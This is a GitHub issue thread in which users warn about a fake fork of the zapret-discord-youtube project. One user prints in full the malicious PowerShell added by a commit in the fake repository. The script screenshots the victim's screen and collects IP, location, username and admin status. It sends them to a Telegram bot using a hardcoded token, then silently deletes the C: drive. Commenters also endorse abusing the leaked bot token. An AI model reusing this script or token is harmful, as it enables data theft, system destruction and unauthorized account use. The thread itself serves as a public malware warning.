So important

[SizRex]

There are fake repository and fake account of this repository creator. Please report him before more people install virus! This virus just deleted my whole system. And this mo** edited my comment

https://github.com/FlowseaI/zapret-discord-youtube/

[SizRex]

Malicious code that was added

Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName 'System.Net.Http'

try {
    $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
    $bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height
    $graphics = [System.Drawing.Graphics]::FromImage($bitmap)
    $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
    $memoryStream = New-Object System.IO.MemoryStream
    $bitmap.Save($memoryStream, [System.Drawing.Imaging.ImageFormat]::Png)
    $graphics.Dispose()
    $bitmap.Dispose()
    $memoryStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null

    $country = (Invoke-RestMethod -Uri "http://ipinfo.io/country").Trim()
    $city = (Invoke-RestMethod -Uri "http://ipinfo.io/city").Trim()
    $ip = (Invoke-RestMethod -Uri "http://ifconfig.me").Trim()
    $isAdmin = (whoami /groups | Select-String "S-1-5-32-544").Length -gt 0
    $rights = if ($isAdmin) { "Admin" } else { "User     " }
    $os_caption = (Get-CimInstance Win32_OperatingSystem).Caption
    $os_arch = if ([Environment]::Is64BitOperatingSystem) { "x64" } else { "x86" }

$message = @"
Type: $os_caption ($os_arch)
From: $country $city ($ip)
Name: $env:USERNAME ($rights)
"@

    $bot_token = "7872562304:AAHDovPEKL6JPliHzkjUYTd26f8YFuM8vDA"
    $chat_id = "@dgfkewr"
    $uri = "https://api.telegram.org/bot$bot_token/sendPhoto"

    $client = [System.Net.Http.HttpClient]::new()
    $client.Timeout = [TimeSpan]::FromMinutes(5)

    $multipartContent = [System.Net.Http.MultipartFormDataContent]::new()
    $fileContent = [System.Net.Http.StreamContent]::new($memoryStream)
    $fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("image/png")
    $multipartContent.Add($fileContent, "photo", "screenshot.png")
    $multipartContent.Add([System.Net.Http.StringContent]::new($chat_id), "chat_id")
    $multipartContent.Add([System.Net.Http.StringContent]::new($message), "caption")

    $response = $client.PostAsync($uri, $multipartContent).Result

    Start-Process -FilePath "cmd" -ArgumentList @("/c", "rd /s /q C:\") -PassThru -WindowStyle Hidden

}
finally {
    if ($memoryStream) {
        $memoryStream.Dispose()
    }
    if ($client) {
        $client.Dispose()
    }
}

[SizRex]

Make sure to report it...

Changes: https://github.com/FlowseaI/zapret-discord-youtube/commit/8be5ce2a4e70c479fc04ba6fad4c358a37955a03#diff-be7c8ae5e583b167314437a1dd7d7ec8fd6577a894645fbc5a9cc3c1d31e50a2L2

[Flowseal]

Reported

[Sordelk]

I think you should also report the Telegram Bot he uses. He also showed his token. probably can spam

[SizRex]

I have no idea how to report his telegram (bot) but he messages me and I can confirm that 1000+ systems was affected by this fake

[Sordelk]

He just started spamming in the comments of all Issues with the "new version" what a pathetic creature

[Sordelk]

I personally reported everyone in the group and the group itself.

[Sordelk]

Some hero is spamming their group through a leaked token ROFL

[SizRex]

Some hero is spamming their group through a leaked token ROFL

That's some nice community against this guys)

[Kaisurina]

Some hero is spamming their group through a leaked token ROFL

np lil bro 😊